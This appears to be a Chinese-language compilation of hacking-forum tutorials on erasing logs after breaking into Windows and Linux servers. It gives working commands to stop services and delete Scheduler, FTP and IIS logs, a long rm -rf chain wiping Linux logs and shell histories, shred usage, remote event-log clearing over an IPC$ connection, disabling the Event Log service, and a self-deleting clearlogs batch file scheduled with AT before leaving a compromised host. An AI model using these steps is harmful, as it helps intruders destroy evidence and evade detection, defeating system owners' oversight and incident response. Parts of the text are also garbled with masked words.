文章大纲：

• 1、一般所谓的黑客在入侵完电脑后都要删除日志，是哪个日志，怎么打开查看？
• 2、入侵Linux系统后日志文件及入侵后日志如何清除
• 3、手工清除服务器日志
• 4、怎么删除网站系统的日志
• 5、如果入侵目标电脑会产生日志的话,那怎么样才能将目标电脑上的日志清除,做到不留痕迹

一般所谓的黑客在入侵完电脑后都要删除日志，是哪个日志，怎么打开查看？

1) Scheduler日志

Scheduler服务日志默认位置：2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt

可以打开schedlgu.txt

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sche *** ngAgent

先停掉他 net stop "task scheduler" (注意不停是删不掉的)

然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.

del sched*.txt

不过你如果不想删他,也可以改改它. 他的内容是这样的:

" "任务计划程序服务"

已退出于 01-5-22 20:37:34

"任务计划程序服务"

已启动于 01-5-25 7:07:37

"任务计划程序服务"

已启动于 01-5-25 7:26:36

"任务计划程序服务"

已退出于 01-5-25 8:47:54 "

很好改的.

(2) FTP日志

Internet信息服务FTP日志默认位置：%sys temroot%\sys tem32\logfiles\msftpsvc1\，默认每天一个日志.

格式是这样的 ex*.log .

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a *** TPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

看看日志文件的格式:

c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log

192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,

0, 0, 331, 0, [3]USER, anonymous, -,

192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53

0, 1326, [3]PASS, IE30User@, -,

关于LOG文件的含意我就不解释了,浪费时间,嘿嘿.

法一: 这个时侯 net stop msftpsvc 停掉后台服务.

然后尽管 del 看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.

法二: 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦

实际上在得到ADMIN权限后,做这些事很容易.

法三:) 最傻瓜的清FTP日志的 *** , cleaniislog 小蓉写的工具,不用我再教了吧!

(3) WWW日志

Internet信息服务WWW日志默认位置：%sys temroot%\sys tem32\logfiles\w3svc1\，默认每天一个日志

注意这是一台NT4的LOGFILES下的文件:

这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .

00-12-04 06:28p ..

01-05-18 12:56p MSFTPSVC1

01-04-23 11:28a MSFTPSVC2

01-01-12 11:56a MSFTPSVC3

01-06-01 08:12a *** TPSVC1

01-09-20 08:55a W3SVC1

01-08-02 10:36a W3SVC10

01-10-11 04:48p W3SVC11

01-07-11 09:16a W3SVC2

01-10-11 10:31a W3SVC3

01-10-10 04:55p W3SVC4

01-09-28 01:43p W3SVC5

01-10-11 08:44a W3SVC6

01-10-11 08:00a W3SVC7

01-09-30 01:49p W3SVC8

01-10-11 08:03a W3SVC9

w3svc1 下的文件:

入侵Linux系统后日志文件及入侵后日志如何清除

现在可以在网上公开获得的日志清除程序代码很粗糙，我曾经看到过最夸张的清日志的代码像这样:

rm -rf /var/log/lastlog ; rm -rf /var/log/telnetd ; rm -rf /var/run/utmp ; rm -rf /var/log/secure ; rm -rf /root/.ksh_history ; rm -rf /root/.bash_history ; rm -rf /root/.bash_logut ; rm -rf /var/log/wtmp ; rm -rf /etc/wtmp ; rm -rf /var/run/utmp ; rm -rf /etc/utmp ; rm -rf /var/log ; rm -rf /var/adm ; rm -rf /var/apache/log ; rm -rf /var/apache/logs ; rm -rf /usr/local/apache/log ; rm -rf /usr/local/apache/logs ; rm -rf /var/log/acct ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/log/proftpd/xferlog.legacy ; rm -rf /var/log/proftpd.access_log ; rm -rf /var/log/proftpd.xferlog ; rm -rf /var/log/httpd/error_log ; rm -rf /var/log/httpd/access_log ; rm -rf /etc/httpd/logs/access_log ; rm -rf /etc/httpd/logs/error_log ;rm -rf /var/log/news/suck.notice ; rm -rf /var/spool/tmp ; rm -rf /var/spool/errors ; rm -rf /var/spool/logs ; rm -rf /var/spool/locks ; rm -rf /usr/local/www/logs/thttpd_log ; rm -rf /var/log/thttpd_log ; rm -rf /var/log/ncftpd/misclog.txt ; rm -rf /var/log/ncftpd.errs ; rm -rf /var/log/auth ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history Cr

整个一rm *** ，要是服务器跑了很长时间，积累了很多日志。你这样一删除，的，你帮他省事了，他也省事，一眼就看出有人进来了。

先不说其他，用rm删除就不可取，正确的删除文件做法是用shred

shred -n 31337 -z -u file_to_delete

这样多次擦除才够安全。

手工清除服务器日志

在入侵过程中，远程主机的Windows系统会对入侵者的登录、注销、连接，甚至复制文件等操作都进行记录，并把这些记录保存到日志文件中。在这些日志文件中，记录着入侵者登录所用的账号，以及入侵者的IP地址等信息。入侵者可以通过多种途径来擦除入侵留下的痕迹，其中手段之一就是用服务器日志进行手动清除。

具体的操作步骤如下。

步骤1：先使用管理员账号与远程主机建立IPC$连接，在远程主机的【控制面板】窗口中双击【管理工具】图标，即可打开【管理工具】窗口。双击【计算机管理】图标项，即可打开【计算机管理】窗口。

步骤2：在其右边列表中展开【计算机管理（本地）】→【系统工具】→【事件查看器】选项，即可打开事件日志窗格，如图8-35所示。其中的事件日志分为 "应用程序"日志、"安全性"日志及"系统"日志3种，这3种日志分别记录了不同种类的事件。

步骤3：用鼠标右键单击要删除的日志文件，在弹出的快捷菜单中选择【清除】命令，即可清除选中的日志。如果想彻底删除日志文件，则可以在【计算机管理】窗口的左窗格中展开【计算机管理（本地）】→【服务和应用程序】→【服务】选项，再在其右窗格中用鼠标右健单击【Event Log】服务，在弹出的快捷菜单中选择【属性】命令，在打开的【属性】对话框中把该服务禁用，如图8-36所示。

（点击查看大图）图8-35 【计算机管理】窗口中的事件记录窗格

（点击查看大图）图8-36  禁用"Event Log"服务

此后，用户只要重新启动系统，该主机/服务器就不会对任何操作进行日志记录了。

怎么删除网站系统的日志

1、网站系统管理后台里，通常情况下一些网站系统后台会有一个日志中心，在这里面可以删除。

2、进入网站系统所在的服务器，从服务器的系统日志文件中删除。

如果入侵目标电脑会产生日志的话,那怎么样才能将目标电脑上的日志清除,做到不留痕迹

系统日志 通过手工很难清除. 这里介绍一个工具 clearlog.exe

使用 *** :

Usage: clearlogs [\\computername] -app / -sec / -sys

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名

** 然后开始清除: ***

clearlogs \\ip -app 这个是清除远程计算机的应用程序日志

clearlogs \\ip -sec 这个是清除远程计算机的安全日志

clearlogs \\ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. *** :

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统罩?

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

之一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用 ***

AT 时间 c:\c.bat

之后你就可以安全离开了. 这样才更安全一点.